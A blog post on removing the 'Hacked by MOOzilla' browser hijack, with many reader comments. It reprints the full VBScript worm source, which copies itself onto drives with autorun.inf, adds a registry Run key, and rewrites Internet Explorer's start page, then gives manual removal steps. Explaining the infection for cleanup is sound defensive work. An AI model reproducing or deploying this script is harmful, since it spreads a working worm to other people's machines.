Recently, I have see many instances of this browser hijack in many machines. People are going nuts with this infection and here I am nearing the solution to wipe it off from the machines which are infected.
Browse and Explorer Hijack ?
Yes. IE gets hijacked after the infection and whenevr IE is opened up, home page gets hijacked and re-routed to http://www.lastchaos.in.th/ .
Apart from the browser hijack, it hacks the windows explorer. In a infected machine, left double click will not work to open the drives under the windows explorer. Right click and open or explore will do that. So, it hijacks the IE and also the windows explorer.
File and Location
The file name which does this hack is IISDLL.dll.vbs and its location is in c:\IISDLL.dll.vbs and C:\Windows\IISDLL.dll.vbs.
The file has read-only attribute and does not allow to make changes to it. One need to change the attibute for making changes to the file.
Mode of Infection?
Going by the script, the mode of infection is through flash or thumb drives. Be careful with yours as machines are rapidly infected with this file.
Solution?
Have tried cleaning the machines with all AV software I could think of and nothing seems to work. I am planning to write a counter script to nullify this one. Till then watch this space for a proper solution.
Where is the script?
If your machine is infected, you can locate the file and right click and edit it with a notepad. If your machine is not infected but you are curious to know what the script does, see below.
IISDLL.dll.vbs
‘My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe IISDLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\IISDLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by MOOzilla”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.lastchaos.in.th/”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
Update
What this moozilla does?
Moozilla hijack is not a malicious program to damage the machine. It is a small windows vb script to hijack the start page of your browser to some Thailand site. The autorun.inf file gets copied to the flash drive from a infected machine. When the flash drive is inserted in another machine, the autoplay feature activates the autotun.inf and copies the ISSDLL.vbs and autorun.inf files to all the drives except A:\ . May be the script writer likes floppy very much. 
Have removed the hacked by moozilla browser hijacker off my machine. 
Here are the manual removal instructions. Watch this space for an automated script to remove the hijack off the machine.
Disclaimer
The solution given here worked for me and it may or may not work for you. In no way, I am responsible if anything happens to your machine after following the steps given below. if the solution helped you, leave a comment down which will make me smile and increase a day my lifetime. You can leave a comment if it did not work, but show some courtesy. I don’t want blood oozing out of my ears after reading your comments. 
Manual Removal Instructions for Moozilla browser hijack
1. Start the Windows in Safe mode. Read Instructions on how to start the Windows in Safe mode.
2. Take out the USB storage devices if any plugged in. Any flash or thumb drives.
3. Open My Computer and look for the number of drives you have. You may have around 3 to 5 drives apart from the A:\ (if you have floppy) or an optical drive (CD or DVD drives).
4. Each drive will be marked by letters like E: ,F: etc; 
To make the computer to show hidden files and fodlers, click tools in My computer and click folder options and click view. In the series of check boxes and radio buttons, do the following three things.
a. Click Show hidden files and folders.
b. Uncheck the box Hide extensions for known file types. 
c. Uncheck the box Hide Protected Operating system files (Recommended).
5. Click Start and click Run Type C:\ and hit enter.
6. Look out for the files named autorun.inf and ISSDLL.dll.vbs. Select them one by one and hit shift+delete keys together.
Navigate to the windows folder under C:\drive and look for the same files and sgift+delete them.
7. In the same way, follow the steps for all the drives listed under MY Computer.
8. Click Start and click Run. Type regedit and click OK. This will open the registry editor.
9. Back up the registry before making any changes to it as it may cause dangerous implications to the machine. Read how to backup windows registry?
10. Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Start Page on the right hand side.
Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Window Title on the right hand side.
Navigate to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete MS32DLL on the right hand side.
11. Restart the machine and Open IE and windows explorer to see that moozilla is gone. Enjoy!
Worked very well thanks for the instructions
If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.
@karthick, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.
@kiron, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
Oh, and it’s an awsome code for what it does…
*note*, you don’t need to remove the .vbs if you can’t, as long as the autorun is gone.
Hi friends,
Keep right click always to open flash drives, it will prevent to execute the auto play option and free from IISDLL virus…..
Thanks. It the process of doing this much easier than what it appears to be. It is absolutely safe and hasslefree and Hacked by MOOzilla goes for ever.
Simply superb solution.
Hi Karthick
I tried with Ur solution which i performed manually but it is still that problem is coming up hacked by MOozilla, what i need to do please reply immediately.
bye
Sunil
Thanks a ton man… u rock…
I cant go after your solution aftr the Point no:5.can you provide a flow chart with easy accesss.it will be very helpful.it’s in your hands to make my PC free from moozilla.
Karthick,
i cant find the file which is(autorun.inf and ISSDLL.dll.vbs.)
where to find this
Hey Brother
Thanks a lot for the solution provided. It did the miracle
thanks a lot karthick! i was struggling to get rid of this moozilla and finally i got the solution from ur site. it was really very helpful. thank u.
super super super tq tq tq grt grt grt
sir
u r ginius i respect u do make a help everytime
u r really good plz send any thing intrested to my email
again u r good
Hi Karthik,
How are you i am also having the same problem but i can open the drives with left click.but in IE it shows Hacked by Moozilla.
Wat is the reason behind.Pls give a solution i got my PC just one month ago.It really terribles me
Thanks a lot…
But can u tell me how to remove the “Autoplay” from the right-click menu for drives……
but still im no longer getting redirected.should i do any thing abt it?if so what?
Good work.
Thanks a Ton.
Worked for me
thanks,
it solved my problem
hi
thanks
worked for me
Hi Karthick,
Your solution worked…thanks
Yousuff
THNKS IT WORKED….U CAN USE UNLOCKER SOFTWARE IF ITS NOT GETTING DELETED….
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
m
Thanks a lot, it really works
see for how many days
COuld you please let me know the source from where we get this virus so that we may take care of the same.